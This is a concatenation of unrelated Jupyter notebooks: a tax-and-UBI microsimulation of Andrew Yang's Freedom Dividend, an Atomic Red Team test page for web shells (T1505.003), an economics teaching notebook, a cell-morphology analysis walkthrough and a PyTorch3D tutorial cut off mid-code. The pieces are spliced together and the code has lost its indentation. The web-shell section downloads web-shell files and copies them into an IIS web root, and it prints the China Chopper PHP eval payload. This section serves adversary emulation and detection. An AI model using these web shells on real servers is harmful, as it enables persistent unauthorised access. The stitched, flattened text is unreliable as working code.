Estimate the effect of Andrew Yang's [Freedom Dividend](https://www.yang2020.com/policies/the-freedom-dividend/) of $12,000 per year per adult over age 18, funded by a 10 percent [value-added tax](https://www.yang2020.com/policies/value-added-tax/), with benefits reduced by up to the UBI amount for each tax unit.
Use `skopt.gbrt_minimize` (gradient boosted trees), which a separate test (`yang_choose_rn_opt_routine.ipynb`) showed performs best of the four `skopt` routines.
Assumptions:
* Adults are 18+ not 19+, for data availability.
* Benefits include SNAP, WIC, SSI, and TANF. Per Yang's [tweet](https://twitter.com/AndrewYang/status/970104619832659968), it excludes housing benefits and Medicare. It also excludes Medicaid, veteran's benefits (which are largely pension and healthcare) and "other benefits" included in C-TAM, which also include some healthcare.
* VAT incidence is proportional to [Tax Policy Center's estimate](https://www.taxpolicycenter.org/briefing-book/who-would-bear-burden-vat) of a 5 percent VAT's effect as of 2015. These are scaled linearly to match Yang's estimate that his VAT would raise $800 billion per year.
* VAT incidence is treated as an income tax; per TPC:
>Conceptually, the tax can either raise the total price (inclusive of the sales tax) paid by consumers or reduce the amount of business revenue available to compensate workers and investors. Theory and evidence suggest that the VAT is passed along to consumers via higher prices. Either way, the decline in real household income is the same regardless of whether prices rise (holding nominal incomes constant) or whether nominal incomes fall (holding the price level constant).
The revenue-neutral monthly UBI should come out to roughly $650.
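Before running the microdata analysis, the benefit-or-UBI interaction for a single tax unit can be sketched with toy numbers (a hypothetical helper, not the `microdf` implementation used below):

```python
def net_income_change(adults, bens, new_taxes, ubi_per_adult=12_000):
    # Each tax unit effectively receives the larger of its current benefits
    # or the full UBI (benefits offset the UBI dollar for dollar), then pays
    # the new taxes (VAT, carbon fee, FTT) out of that.
    max_ubi = adults * ubi_per_adult
    return max(max_ubi, bens) - bens - new_taxes

# Toy examples (hypothetical tax units):
print(net_income_change(adults=2, bens=0, new_taxes=3_000))       # 21000
print(net_income_change(adults=1, bens=15_000, new_taxes=1_000))  # -1000
```

The second unit loses on net: its existing benefits already exceed the UBI, so it keeps them and only pays the new taxes.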
*Data: CPS | Tax year: 2019 | Type: Static | Author: Max Ghenis*
## Setup
### Imports
```
import taxcalc as tc
import microdf as mdf
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
import skopt
from skopt import plots as skopt_plots
tc.__version__
```
### Settings
```
sns.set_style('white')
DPI = 500
mpl.rc('savefig', dpi=DPI)
mpl.rcParams['figure.dpi'] = DPI
mpl.rcParams['figure.figsize'] = 6.4, 4.8 # Default.
mpl.rcParams['font.sans-serif'] = 'Roboto'
mpl.rcParams['font.family'] = 'sans-serif'
# Set title text color to dark gray (https://material.io/color) not black.
TITLE_COLOR = '#212121'
mpl.rcParams['text.color'] = TITLE_COLOR
# Axis titles and tick marks are medium gray.
AXIS_COLOR = '#757575'
mpl.rcParams['axes.labelcolor'] = AXIS_COLOR
mpl.rcParams['xtick.color'] = AXIS_COLOR
mpl.rcParams['ytick.color'] = AXIS_COLOR
GRID_COLOR = '#eeeeee' # Previously lighter #f5f5f5.
# Use Seaborn's default color palette.
# https://stackoverflow.com/q/48958426/1840471 for reproducibility.
sns.set_palette(sns.color_palette())
# Show two decimals in tables.
pd.set_option('precision', 2)
```
## Major parameters
```
UBI_MAX = 1000 * 12 # Maximum amount to test.
TOTAL_VAT = 800e9
TOTAL_FTT = 50e9
CARBON_FEE = 20 # It's actually $40, but half goes to clean energy projects.
CARBON_FEE_TPC = 49 # Fee from the paper.
CARBON_FEE_UBI_SHARE = 0.5 # Half goes to UBI, half to other projects.
PCT_CITIZEN = 0.93
# Yang's plan wouldn't be enacted until 2021, but
# this allows people to enter current income.
YEAR = 2019
```
## Data
```
recs = tc.Records.cps_constructor()
BENS = ['snap_ben', 'ssi_ben', 'tanf_ben', 'wic_ben']
```
Exclude Medicaid and Medicare from `aftertax_income`.
NB: This is equivalent to setting their consumption value to zero, which would be an assumption rather than a reform.
```
MCAID_MCARE_REPEAL_REFORM = {
'BEN_mcaid_repeal': {2019: True},
'BEN_mcare_repeal': {2019: True},
}
YANG_REFORM = {
'SS_Earnings_c': {2019: 9e99},
'CG_nodiff': {2019: True}
}
# Also exclude Medicaid and Medicare.
YANG_REFORM.update(MCAID_MCARE_REPEAL_REFORM)
BASE_GROUP_VARS = ['nu18', 'n1820', 'n21', 'aftertax_income',
'expanded_income', 'XTOT'] + BENS + mdf.ECI_REMOVE_COLS
GROUP_VARS = 'combined'
# Don't use metric_vars since we'll split later by citizenship status.
base0 = mdf.calc_df(records=recs, year=YEAR,
group_vars=mdf.listify([BASE_GROUP_VARS, GROUP_VARS]),
reform=MCAID_MCARE_REPEAL_REFORM).drop('tax', axis=1)
# Don't use metric_vars since we'll split later by citizenship status.
yang0 = mdf.calc_df(records=recs, year=YEAR, group_vars=GROUP_VARS,
reform=YANG_REFORM).drop('tax', axis=1)
```
Duplicate records to make citizens and noncitizens, and create new record IDs.
```
def split_citizen_noncitizen(df, pct_citizen):
# Citizen.
citizen = df.copy(deep=True)
citizen['citizen'] = True
citizen.s006 *= pct_citizen
citizen.index = citizen.index.astype(str) + 'c'
# Noncitizen.
non_citizen = df.copy(deep=True)
non_citizen['citizen'] = False
non_citizen.s006 *= 1 - pct_citizen
non_citizen.index = non_citizen.index.astype(str) + 'nc'
# Combine.
return pd.concat([citizen, non_citizen])
def prep_data(df0):
df = split_citizen_noncitizen(df0, PCT_CITIZEN)
# Add weighted versions of the income and tax metrics.
mdf.add_weighted_metrics(df, ['expanded_income', 'aftertax_income',
'combined', 'XTOT'])
# Add TPC's expanded cash income measure and its quantiles.
df['tpc_eci'] = mdf.tpc_eci(df)
mdf.add_weighted_quantiles(df, 'tpc_eci')
df['bens'] = df[BENS].sum(axis=1)
df['adults'] = df.n1820 + df.n21
df['adult_citizens'] = df.adults * df.citizen
return df
base = prep_data(base0)
yang = split_citizen_noncitizen(yang0, PCT_CITIZEN)
```
### Combine
We only need combined tax liability.
```
yang = yang[['combined']].join(base, lsuffix='_reform', rsuffix='_base')
```
Recalculate after-tax income with the change in combined tax liability.
*This assumes that the employee bears the entirety of the additional payroll tax.*
```
yang['combined_chg'] = yang.combined_reform - yang.combined_base
yang.aftertax_income = yang.aftertax_income - yang.combined_chg
mdf.add_weighted_metrics(yang, 'aftertax_income')
```
Drop unnecessary columns.
```
yang.drop(['combined_reform', 'combined_base'], axis=1, inplace=True)
mdf.add_weighted_metrics(base, ['bens', 'combined'])
```
### Revenue-neutral
```
def yang_shortfall(ubi=UBI_MAX, base=base, yang=yang):
print("Trying UBI level $" + str(round(ubi, 2)) + "...")
# Work on a copy so the caller's DataFrame is not modified.
yang = yang.copy(deep=True)
yang['max_ubi'] = yang.adult_citizens * ubi
# Adds `ubi` column based on max_ubi and bens. Also adjusts bens.
mdf.ubi_or_bens(yang, BENS)
yang['aftertax_income_pre_new_taxes'] = (
yang.aftertax_income + yang.combined_chg)
# Update ECI.
yang['tpc_eci'] = mdf.tpc_eci(yang) + yang.ubi
# Weight.
mdf.add_weighted_metrics(yang,
['ubi', 'max_ubi', 'bens', 'aftertax_income'])
# New taxes:
# VAT.
mdf.add_vat(yang, total=TOTAL_VAT, verbose=False)
yang.combined_chg = yang.combined_chg + yang.vat
yang.aftertax_income = yang.aftertax_income - yang.vat
vat_rev_b = mdf.weighted_sum(yang, 'vat') / 1e9
# Carbon tax.
mdf.add_carbon_tax(yang, ratio=CARBON_FEE / CARBON_FEE_TPC, verbose=False)
yang.combined_chg = yang.combined_chg + yang.carbon_tax
yang.aftertax_income = yang.aftertax_income - yang.carbon_tax
carbon_tax_rev_b = mdf.weighted_sum(yang, 'carbon_tax') / 1e9
# FTT.
mdf.add_ftt(yang, total=TOTAL_FTT, verbose=False)
yang.combined_chg = yang.combined_chg + yang.ftt
yang.aftertax_income = yang.aftertax_income - yang.ftt
ftt_rev_b = mdf.weighted_sum(yang, 'ftt') / 1e9
# Reweight.
mdf.add_weighted_metrics(yang,
['aftertax_income', 'combined_chg',
'aftertax_income_pre_new_taxes'])
bens_chg_m = yang.bens_m.sum() - base.bens_m.sum()
tax_chg_m = yang.combined_chg_m.sum()
return (yang.ubi_m.sum() + bens_chg_m - tax_chg_m) * 1e6
def yang_abs_shortfall(ubi):
return np.abs(yang_shortfall(ubi[0]))
```
Test.
```
yang_abs_shortfall([12000]) / 1e12 # Trillions.
gbrt_res = skopt.gbrt_minimize(yang_abs_shortfall, [(0., UBI_MAX)],
n_calls=100, n_jobs=-1, random_state=827)
'Revenue-neutral UBI: $' + str(round(gbrt_res.x[0] / 12, 2)) + '.'
skopt_plots.plot_convergence(gbrt_res)
plt.yscale('log')
plt.show()
def shortfall_by_ubi(ubi=UBI_MAX):
return pd.DataFrame({'ubi': [ubi],
'shortfall': [yang_shortfall(ubi)]})
shortfalls_l = []
for i in np.arange(0, UBI_MAX + 1, 1200):
shortfalls_l.append(shortfall_by_ubi(ubi=i))
shortfalls = pd.concat(shortfalls_l)
shortfalls['abs_shortfall'] = np.abs(shortfalls.shortfall)
shortfalls['ubi_monthly'] = shortfalls.ubi / 12
shortfalls
ax = shortfalls.sort_values('ubi').plot('ubi_monthly', 'shortfall')
plt.title('Budget shortfall by monthly UBI with Yang revenue proposals',
loc='left')
sns.despine(left=True, bottom=True)
ax.get_xaxis().set_major_formatter(
mpl.ticker.FuncFormatter(lambda x, p: '$' + format(int(x), ',')))
ax.get_yaxis().set_major_formatter(
mpl.ticker.FuncFormatter(lambda x, p: '$' + format(x / 1e12) + 'T'))
ax.grid(color=GRID_COLOR)
ax.legend_.remove()
ax.axhline(0, color='lightgray', zorder=-1) # Widen?
plt.xlabel('Monthly UBI')
plt.ylabel('Budget shortfall')
plt.show()
```
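Since the shortfall is monotone in the UBI amount, a plain bisection on the signed shortfall would also locate the revenue-neutral level. A sketch with a toy linear shortfall function (illustrative numbers only; the real `yang_shortfall` above is expensive to evaluate, which is part of why `skopt` is used):

```python
def bisect_root(f, lo, hi, tol=1e-6):
    # Assumes f is monotone and f(lo), f(hi) have opposite signs.
    flo = f(lo)
    while hi - lo > tol:
        mid = 0.5 * (lo + hi)
        if f(mid) * flo > 0:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

# Stand-in for yang_shortfall: a toy monotone shortfall that crosses zero
# at a $7,800/year UBI (purely illustrative numbers).
toy_shortfall = lambda ubi: 1.5e8 * (ubi - 7_800)

rn_ubi = bisect_root(toy_shortfall, 0, 12_000)
print(round(rn_ubi))  # → 7800
```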
# T1505.003 - Server Software Component: Web Shell
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
## Atomic Tests
```
# Import the module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
```
### Atomic Test #1 - Web Shell Written to Disk
This test simulates an adversary leveraging web shells by emulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
**Supported Platforms:** windows
#### Dependencies: Run with `powershell`!
##### Description: Web shell must exist on disk at specified location (#{web_shells})
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1505.003\src\) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1505.003\src\) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\/test.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "PathToAtomicsFolder\T1505.003\src\/cmd.aspx"
```
```
Invoke-AtomicTest T1505.003 -TestNumbers 1 -GetPreReqs
```
#### Attack Commands: Run with `command_prompt`
```command_prompt
xcopy PathToAtomicsFolder\T1505.003\src\ C:\inetpub\wwwroot
```
```
Invoke-AtomicTest T1505.003 -TestNumbers 1
```
## Detection
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
<code><?php @eval($_POST['password']);?></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
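As a rough illustration of the file-monitoring idea, one could flag files in the web root modified after the last known deployment. This is a hedged sketch in Python; the web-root path and deployment timestamp in the example are assumptions:

```python
import os
import time

def recently_modified(web_root, last_deploy_epoch):
    """Return files under web_root changed after the last known deployment."""
    flagged = []
    for dirpath, _, filenames in os.walk(web_root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # Any write after the deployment is worth a closer look.
            if os.path.getmtime(path) > last_deploy_epoch:
                flagged.append(path)
    return flagged

# Example (hypothetical web root and deploy time):
# suspicious = recently_modified(r'C:\inetpub\wwwroot', time.time() - 86400)
```

A real deployment pipeline would compare against known file hashes rather than timestamps alone, since timestamps are trivially forged.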
# Introduction
**Summary:** The Jupyter notebook is a document with text, code and results.
This is a text cell, or more precisely a *markdown* cell.
* Press <kbd>Enter</kbd> to *edit* the cell.
* Press <kbd>Ctrl+Enter</kbd> to *run* the cell.
* Press <kbd>Shift+Enter</kbd> to *run* the cell + advance.
We can make lists:
1. **First** item
2. *Second* item
3. ~~Third~~ item
We can also do LaTeX math, e.g. $\alpha^2$ or
$$
X = \int_0^{\infty} \frac{x}{x+1} dx
$$
```
# this is a code cell
# let us do some calculations
a = 2
b = 3
c = a+b
# lets print the results (shown below the cell)
print(c)
```
We can now write some more text, and continue with our calculations.
```
d = c*2
print(d)
```
**Note:** Although JupyterLab runs in a browser, it is running locally (the path is something like *localhost:8888/lab*).<br>
**Binder:** The exception is if you use *binder*; then JupyterLab will run in the cloud, and the path will begin with *hub.mybinder.org*:
[<img src="https://mybinder.org/badge_logo.svg">](https://mybinder.org/v2/gh/NumEconCopenhagen/lectures-2019/master?urlpath=lab/tree/01/Introduction.ipynb)
**Note:** *You cannot save your result when using binder*.
# Solve the consumer problem
Consider the following consumer problem:
$$
\begin{aligned}
V(p_{1},p_{2},I) & = \max_{x_{1},x_{2}} x_{1}^{\alpha}x_{2}^{1-\alpha}\\
& \text{s.t.}\\
p_{1}x_{1}+p_{2}x_{2} & \leq I,\,\,\,p_{1},p_{2},I>0\\
x_{1},x_{2} & \geq 0
\end{aligned}
$$
We can solve this problem _numerically_ in a few lines of code.
1. Choose some **parameters**:
```
alpha = 0.25
I = 10
p1 = 1
p2 = 2
```
2. The **consumer objective** is:
```
def value_of_choice(x1,alpha,I,p1,p2):
# a. all income not spent on the first good
# is spent on the second
x2 = (I-p1*x1)/p2
# b. the resulting utility is
utility = x1**alpha * x2**(1-alpha)
return utility
```
3. We can now use a function from the *scipy* module to **solve the consumer problem**.
```
# a. load external module from scipy
from scipy import optimize
# b. make value-of-choice a function of x1 only
obj = lambda x1: -value_of_choice(x1,alpha,I,p1,p2)
# c. call minimizer
solution = optimize.minimize_scalar(obj,method='bounded',bounds=(0,I/p1))
# d. print result
x1 = solution.x
x2 = (I-x1*p1)/p2
print(x1,x2)
```
**Task**: Solve the consumer problem with the CES utility function.
$$
u(x_1,x_2) = (\alpha x_1^{-\beta} + (1-\alpha) x_2^{-\beta})^{-1/\beta}
$$
```
# update this code
# a. choose parameters
alpha = 0.5
beta = 0.000001
I = 10
p1 = 1
p2 = 2
# b. value-of-choice
def value_of_choice_ces(x1,alpha,beta,I,p1,p2):
x2 = (I-p1*x1)/p2
if x1 > 0 and x2 > 0:
utility = (alpha*x1**(-beta)+(1-alpha)*x2**(-beta))**(-1/beta)
else:
utility = 0
return utility
# c. objective
obj = lambda x1: -value_of_choice_ces(x1,alpha,beta,I,p1,p2)
# d. solve
solution = optimize.minimize_scalar(obj,method='bounded',bounds=(0,I/p1))
# e. result
x1 = solution.x
x2 = (I-x1*p1)/p2
print(x1,x2)
```
# Simulate the AS-AD model
Consider the following AS-AD model:
$$
\begin{aligned}
\hat{y}_{t} &= b\hat{y}_{t-1}+\beta(z_{t}-z_{t-1})-a\beta s_{t}+a\beta\phi s_{t-1} \\
\hat{\pi}_{t} &= b\hat{\pi}_{t-1}+\beta\gamma z_{t}-\beta\phi\gamma z_{t-1}+\beta s_{t}-\beta\phi s_{t-1} \\
z_{t} &= \delta z_{t-1}+x_{t}, x_{t} \sim N(0,\sigma_x^2) \\
s_{t} &= \omega s_{t-1}+c_{t}, c_{t} \sim N(0,\sigma_c^2) \\
b &= \frac{1+a\phi\gamma}{1+a\gamma} \\
\beta &= \frac{1}{1+a\gamma}
\end{aligned}
$$
where $\hat{y}_{t}$ is the output gap, $\hat{\pi}_{t}$ is the inflation gap, $z_{t}$ is an AR(1) demand shock, and $s_{t}$ is an AR(1) supply shock.
1. Choose **parameters**:
```
a = 0.4
gamma = 0.1
phi = 0.9
delta = 0.8
omega = 0.15
sigma_x = 1
sigma_c = 0.2
T = 100
```
2. Calculate **combined parameters**:
```
b = (1+a*phi*gamma)/(1+a*gamma)
beta = 1/(1+a*gamma)
```
3. Define **model functions**:
```
y_hat_func = lambda y_hat_lag,z,z_lag,s,s_lag: b*y_hat_lag + beta*(z-z_lag) - a*beta*s + a*beta*phi*s_lag
pi_hat_func = lambda pi_lag,z,z_lag,s,s_lag: b*pi_lag + beta*gamma*z - beta*phi*gamma*z_lag + beta*s - beta*phi*s_lag
z_func = lambda z_lag,x: delta*z_lag + x
s_func = lambda s_lag,c: omega*s_lag + c
```
4. Run the **simulation**:
```
import numpy as np
# a. set the random seed
np.random.seed(2015)
# b. allocate simulation data
x = np.random.normal(loc=0,scale=sigma_x,size=T)
c = np.random.normal(loc=0,scale=sigma_c,size=T)
z = np.zeros(T)
s = np.zeros(T)
y_hat = np.zeros(T)
pi_hat = np.zeros(T)
# c. run simulation
for t in range(1,T):
# i. update z and s
z[t] = z_func(z[t-1],x[t])
s[t] = s_func(s[t-1],c[t])
# ii. compute y and pi
y_hat[t] = y_hat_func(y_hat[t-1],z[t],z[t-1],s[t],s[t-1])
pi_hat[t] = pi_hat_func(pi_hat[t-1],z[t],z[t-1],s[t],s[t-1])
```
5. **Plot** the simulation:
```
import matplotlib.pyplot as plt
%matplotlib inline
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(y_hat,label='$\\hat{y}$')
ax.plot(pi_hat,label='$\\hat{\\pi}$')
ax.set_xlabel('time')
ax.set_ylabel('percent')
ax.set_ylim([-8,8])
ax.legend(loc='upper left');
```
I like the **seaborn style**:
```
plt.style.use('seaborn')
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(y_hat,label='$\\hat{y}$')
ax.plot(pi_hat,label='$\\hat{\\pi}$')
ax.set_xlabel('time')
ax.set_ylabel('percent')
ax.set_ylim([-8,8])
ax.legend(loc='upper left',facecolor='white',frameon='True');
```
# Using modules
A **module** is a **.py**-file with functions you import and can then call in the notebook.
Try to open **mymodule.py** and have a look.
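`mymodule.py` itself is not shown in this notebook; a minimal file consistent with the call below might look like the following (the function body here is purely illustrative — check the actual file):

```python
# mymodule.py (hypothetical contents -- the real file may differ)
def myfunction(x):
    """Return the square of x (illustrative body)."""
    return x**2
```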
```
import mymodule
x = 5
y = mymodule.myfunction(5)
print(y)
```
# Analysis step by step
We provide here a step-by-step guide explaining how the different [code components](code_structure) of a complete analysis are used "under the hood", in case you want to re-use them or need a deeper understanding of the code.
## Dataset
We use here a synthetic dataset that simulates microscopy observations of a cell. The dataset can be found in [this folder](../synthetic/data) and was generated using the [simulate_data](../synthetic/simulate_data.ipynb) notebook. It is composed of 40 time points and three channels. A single cell starts as a circular object in the image center, and, over the 40 frames, the top cell edge moves upwards and downwards. The intensity in the first channel is homogeneous and is used for segmentation. In the two other channels, fluorescence is inhomogeneous, located at the cell bottom, and varies over time, including a time-shift between the second and third channels. The dataset has already been annotated and processed in ilastik, with the result stored [here](../synthetic/data/Results_ilastik/segmented).
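As a toy illustration of such a synthetic frame (not the actual `simulate_data` code), a circular binary cell in the image center can be generated like this:

```python
import numpy as np

def circular_cell(shape=(100, 100), radius=20):
    # Binary mask of a disk centered in the image.
    yy, xx = np.mgrid[0:shape[0], 0:shape[1]]
    cy, cx = shape[0] / 2, shape[1] / 2
    return ((yy - cy) ** 2 + (xx - cx) ** 2 <= radius ** 2).astype(np.uint8)

mask = circular_cell()
print(mask.shape, mask.sum())  # disk area ≈ pi * 20**2 ≈ 1257 pixels
```

Deforming the top edge of such a mask over 40 frames, and painting intensity gradients into two extra channels, would reproduce the qualitative behavior described above.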
## morphodynamics.dataset
The first step is to create a dataset object. For that we import the appropriate format from the module, in this case H5.
```
from morphodynamics.dataset import H5
```
Then we need to specify the location of the dataset:
```
data_folder = '../synthetic/data'
```
and specify which channels we intend to use. We need to provide the name of the stack used for segmentation:
```
morpho_name = 'synth_ch1.h5'
```
as well as a list of stack names whose intensity we want to analyze:
```
signal_name = ['synth_ch2.h5','synth_ch3.h5']
```
Now we can create our dataset using the H5 object:
```
data = H5(
expdir=data_folder,
signal_name=signal_name,
morpho_name=morpho_name,
)
```
The data object has several attributes and methods. For example, we can load the segmentation-channel and signal-channel images at time point 8:
```
import matplotlib.pyplot as plt
time = 8
image1 = data.load_frame_morpho(time)
image2 = data.load_frame_signal(0, time)
image3 = data.load_frame_signal(1, time)
fig, ax = plt.subplots(1, 3, figsize=(16,5))
ax[0].imshow(image1, cmap = 'gray')
ax[0].set_title('Channel 1')
ax[1].imshow(image2, cmap = 'gray')
ax[1].set_title('Channel 2')
ax[2].imshow(image3, cmap = 'gray')
ax[2].set_title('Channel 3');
```
## Set folders
We need to define three folders:
- ```data_folder``` a folder that contains the image data
- ```analysis_folder```, a folder that will contain the results
- ```segmentation_folder```, a folder that either already contains pre-segmented data (e.g. as output by ilastik) or that will host the segmented images
```
from pathlib import Path
import os
import shutil
import numpy as np
segmentation_folder = Path("../synthetic/data/Ilastiksegmentation")
analysis_folder = Path("data/Results_step")
if not analysis_folder.is_dir():
analysis_folder.mkdir(parents=True)
```
## Set-up parameters for analysis
Now we create a Param object where we store parameters for our segmentation:
```
from morphodynamics.parameters import Param
param = Param(data_folder=data_folder, analysis_folder=analysis_folder, seg_folder=segmentation_folder,
morpho_name=morpho_name, signal_name=signal_name)
param.width = 5
param.depth = 5
param.lambda_ = 10
param.seg_algo = 'ilastik'
```
## Calibrate number of windows and cell location
Now we can finally run the analysis. In a first step, we need to estimate into how many layers (```J```) and how many windows per layer (```I```) our cell should be split based on the desired width and depth of a window. Here we also determine the center of mass position of the cell (```location```):
```
from morphodynamics.analysis_par import calibration, segment_all
location, J, I = calibration(data, param, model=None)
print(f'cell location: {location}')
print(f'number of windows per layer I: {I}')
print(f'number of layer J: {J}')
```
## Set-up results structure
We also need to set up a data structure to save some output information, such as windowing information (which pixels belong to which window) or per-window signal values. For that we use the ```Results``` structure from the ```morphodynamics.results``` module. To create "empty" fields we need to know the number of windows, time points and signal channels:
```
from morphodynamics.results import Results
# Result structures that will be saved to disk
res = Results(
J=J, I=I, num_time_points=data.K, num_channels=len(data.signal_name)
)
```
## Start dask
To make computation faster, the slow parts of the code are executed in parallel using the Dask library. One of its great advantages is that it allows the same code to run seamlessly on a laptop and on a cluster:
```
from dask.distributed import Client
client = Client()
```
## Segmentation
The first step of the pipeline is the cell segmentation. As we are using the ilastik pre-segmentation this step is automatically skipped here:
```
# Segment all images but don't select cell
if param.seg_algo == 'ilastik':
segmented = np.arange(0, data.K)
else:
segmented = segment_all(data, param, client, model=None)
```
## Tracking
We might have multiple cells in a field of view, so that our segmentation output is not a simple binary mask but a labeled mask with multiple cells. We therefore have to decide which cell to consider. This can be done in the UI by picking a point in the image or by manually indicating the x-y location of a cell. Here we only have a single cell, so the selection is automatic. Once a cell has been selected in the first frame, we can track it across frames. This part of the analysis cannot be parallelized, as the cell has to be tracked in successive frames:
```
from morphodynamics.analysis_par import track_all
# do the tracking
segmented = track_all(segmented, location, param)
```
The output of the tracking is stored as a series of binary masks named ```tracked_k_0.tif```, ```tracked_k_1.tif```, etc.
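A small sketch (assuming the `analysis_folder` layout described above) for enumerating those masks in frame order:

```python
from pathlib import Path

def tracked_masks(analysis_folder):
    # Sort tracked_k_0.tif, tracked_k_1.tif, ... numerically by frame index,
    # since lexicographic order would put tracked_k_10 before tracked_k_2.
    seg = Path(analysis_folder) / 'segmented'
    return sorted(seg.glob('tracked_k_*.tif'),
                  key=lambda p: int(p.stem.split('_')[-1]))

# Example (hypothetical folder): masks = tracked_masks('data/Results_step')
```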
## Splining
Now that we have binary masks, we can analyze their contours and fit a spline function to them. The spline information is also stored in the ```res``` structure to avoid the need for recalculation. Here ```s_all``` is a dictionary keyed by frame number that contains the spline information.
```
from morphodynamics.analysis_par import spline_all
# get all splines
s_all = spline_all(data.K, param.lambda_, param, client)
import skimage.io
from morphodynamics.splineutils import splevper
frame = 20
tracked_image = skimage.io.imread(analysis_folder.joinpath(f"segmented/tracked_k_{str(frame)}.tif"))
splined = splevper(np.linspace(0,1,100), s_all[frame])
fig, ax = plt.subplots(figsize=(7,7))
ax.imshow(tracked_image, cmap='gray')
ax.plot(splined[0], splined[1], 'r');
```
## Aligning splines and creating rasterized images
Given all the splines, we now need to align them to account for x-y shifts (e.g. if the cell is moving) and for shifts of the spline origin along the contour. Once the alignment is done, we can create a rasterized version of the contour, i.e. an image of the contour where the pixel value corresponds to the curvilinear distance from the spline origin. This is later used to create windows.
The aligned splines are saved in ```s0prm_all``` and the shift in origin in ```ori_all```.
```
from morphodynamics.analysis_par import align_all
# align curves across frames and rasterize the windows
s0prm_all, ori_all = align_all(
s_all, data.shape, param.n_curve, param, client
)
raster_image = skimage.io.imread(analysis_folder.joinpath("segmented/rasterized_k_0.tif"))
fig, ax = plt.subplots(figsize=(7,7))
ax.imshow(raster_image, cmap = 'gray')
ax.set_title('Rasterized image');
```
As we calculate the spline origin shift between pairs of successive frames (so that the operation can be parallelized), we need to calculate a cumulative sum to recover the shift between frame 0 and frame ```f```:
```
# origin shifts have been computed pair-wise. Calculate the cumulative
# sum to get a "true" alignment on the first frame
res.orig = np.array([ori_all[k] for k in range(data.K)])
res.orig = np.cumsum(res.orig)
```
## Creating windows
Now that we have the rasterized image and the spline information, we can split each cell into layers with windows (using distance transform and curvilinear distance as "coordinates"):
```
from morphodynamics.analysis_par import windowing_all
# create the windows
windowing_all(s_all, res.orig, param, J, I, client)
```
## Window mapping
With the splines and the windows information, we can now find optimal points along successive splines that minimize deformation defined according to a certain metric combining xy-displacement across frames and curvilinear distance between points in a given frame.
It is important to mention here that the windows are **not** adjusted using that optimization. Windows are simply calculated based on splines that have been shift-corrected (x-y) and "curvilinear"-corrected so that they have matching positions. The displacement, on the other hand, is calculated by optimizing the location of points on the spline of frame t+1 relative to the *window positions* at frame t.
```
from morphodynamics.analysis_par import window_map_all
# define windows for each frame and compute pairs of corresponding
# points on successive splines for displacement measurement
t_all, t0_all = window_map_all(
s_all,
s0prm_all,
J,
I,
res.orig,
param.n_curve,
data.shape,
param,
client
)
```
## Extracting signals
In a final step, we calculate the mean and standard deviation of the signal present in all calculated windows. We can also now compute the actual "optimized" displacement between successive frames. All these results are saved in the ```res``` structure.
```
from morphodynamics.analysis_par import extract_signal_all, compute_displacement
# Signals extracted from various imaging channels
mean_signal, var_signal = extract_signal_all(data, param, J, I)
# compute displacements
res.displacement = compute_displacement(s_all, t_all, t0_all)
# Save variables for archival
res.spline = [s_all[k] for k in range(data.K)]
res.param0 = [t0_all[k] for k in t0_all]
res.param = [t_all[k] for k in t_all]
res.mean = mean_signal
res.var = var_signal
```
## Check results
We can have a look at the results to estimate if everything worked as expected.
```
import pickle
import skimage.io
t = 0
name = os.path.join(
param.analysis_folder,
"segmented",
"window_image_k_" + str(t) + ".tif",
)
image = data.load_frame_morpho(t)
b0 = skimage.io.imread(name)
b0 = b0.astype(float)
b0[b0 == 0] = np.nan
fig, ax = plt.subplots(figsize=(10,10))
ax.imshow(image, cmap='gray')
ax.imshow(b0, alpha = 0.5, cmap='Reds',vmin=0,vmax=0.5);
```
```
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
```
# Fit a volume via raymarching
This tutorial shows how to fit a volume given a set of views of a scene using differentiable volumetric rendering.
More specifically, this tutorial will explain how to:
1. Create a differentiable volumetric renderer.
2. Create a Volumetric model (including how to use the `Volumes` class).
3. Fit the volume based on the images using the differentiable volumetric renderer.
4. Visualize the predicted volume.
## 0. Install and Import modules
Ensure `torch` and `torchvision` are installed. If `pytorch3d` is not installed, install it using the following cell:
```
import os
import sys
import torch
need_pytorch3d=False
try:
import pytorch3d
except ModuleNotFoundError:
need_pytorch3d=True
if need_pytorch3d:
if torch.__version__.startswith("1.7") and sys.platform.startswith("linux"):
# We try to install PyTorch3D via a released wheel.
version_str="".join([
